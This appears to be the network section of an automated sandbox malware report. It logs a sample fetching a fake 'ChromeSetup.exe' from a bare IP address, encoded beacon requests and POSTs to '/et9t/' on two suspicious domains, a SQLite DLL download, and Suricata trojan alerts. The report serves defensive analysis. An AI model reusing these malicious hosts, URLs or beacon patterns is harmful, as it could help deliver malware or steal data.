Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.sdrfgjf04.sbs | 154.23.176.81 | |
| www.dmidevel.com | 52.17.186.13 | |
| www.eturnum.org |
CNAME
eturnum.org
|
149.255.59.16 |
| www.sqlite.org | 45.33.6.223 |
- TCP Requests
-
-
192.168.56.101:49169 149.255.59.16:80www.eturnum.org
-
192.168.56.101:49170 149.255.59.16:80www.eturnum.org
-
192.168.56.101:49172 154.23.176.81:80www.sdrfgjf04.sbs
-
192.168.56.101:49173 154.23.176.81:80www.sdrfgjf04.sbs
-
192.168.56.101:49163 23.94.148.61:80
-
192.168.56.101:49171 45.33.6.223:80www.sqlite.org
-
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:59006 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.101:123
-
192.168.56.103:137 192.168.56.101:137
-
GET
200
http://23.94.148.61/800/ChromeSetup.exe
REQUEST
RESPONSE
BODY
GET /800/ChromeSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: 23.94.148.61
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 04 Aug 2023 00:02:19 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 03 Aug 2023 00:28:26 GMT
ETag: "df600-601f9dbd54261"
Accept-Ranges: bytes
Content-Length: 914944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
POST
404
http://www.eturnum.org/et9t/
REQUEST
RESPONSE
BODY
POST /et9t/ HTTP/1.1
Host: www.eturnum.org
Connection: close
Content-Length: 173
Cache-Control: no-cache
Origin: http://www.eturnum.org
User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.eturnum.org/et9t/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 04 Aug 2023 00:03:33 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 315
Connection: close
GET
404
http://www.eturnum.org/et9t/?XFkk=oGB2a62R5hQvo2E9fBkXawOuNKj3Dek6/gk22RSM/jZ849uvwjkHsue2s///UvCqJC6xkWcBqYeWgpc71Q83w80Z1Wi48i4g+hNU7Ic=&25vCm=ziVcI1CGgxu
REQUEST
RESPONSE
BODY
GET /et9t/?XFkk=oGB2a62R5hQvo2E9fBkXawOuNKj3Dek6/gk22RSM/jZ849uvwjkHsue2s///UvCqJC6xkWcBqYeWgpc71Q83w80Z1Wi48i4g+hNU7Ic=&25vCm=ziVcI1CGgxu HTTP/1.1
Host: www.eturnum.org
Connection: close
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 04 Aug 2023 00:03:35 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 315
Connection: close
GET
200
http://www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
REQUEST
RESPONSE
BODY
GET /2020/sqlite-dll-win32-x86-3310000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.sqlite.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Date: Fri, 04 Aug 2023 00:03:38 GMT
Last-Modified: Sun, 26 Jan 2020 18:03:34 GMT
Cache-Control: max-age=120
ETag: "m5e2dd476s791e6"
Content-type: application/zip; charset=utf-8
Content-length: 496102
POST
404
http://www.sdrfgjf04.sbs/et9t/
REQUEST
RESPONSE
BODY
POST /et9t/ HTTP/1.1
Host: www.sdrfgjf04.sbs
Connection: close
Content-Length: 185
Cache-Control: no-cache
Origin: http://www.sdrfgjf04.sbs
User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sdrfgjf04.sbs/et9t/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 404 Not Found
Date: Fri, 04 Aug 2023 00:05:23 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET
404
http://www.sdrfgjf04.sbs/et9t/?XFkk=fyGICc5TieCCYxLA9A3YXfgdgdyUYVbgq7FJ/PFTCWHsrK2PzodQNgOuC22hjbDQxS9NYwBdAOx0BZ+otaqny3v5VddjKMYrJbXKRJI=&25vCm=ziVcI1CGgxu
REQUEST
RESPONSE
BODY
GET /et9t/?XFkk=fyGICc5TieCCYxLA9A3YXfgdgdyUYVbgq7FJ/PFTCWHsrK2PzodQNgOuC22hjbDQxS9NYwBdAOx0BZ+otaqny3v5VddjKMYrJbXKRJI=&25vCm=ziVcI1CGgxu HTTP/1.1
Host: www.sdrfgjf04.sbs
Connection: close
HTTP/1.1 404 Not Found
Date: Fri, 04 Aug 2023 00:05:26 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49163 -> 23.94.148.61:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
| TCP 23.94.148.61:80 -> 192.168.56.101:49163 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | A Network Trojan was detected |
| TCP 23.94.148.61:80 -> 192.168.56.101:49163 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 23.94.148.61:80 -> 192.168.56.101:49163 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | A Network Trojan was detected |
| TCP 23.94.148.61:80 -> 192.168.56.101:49163 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts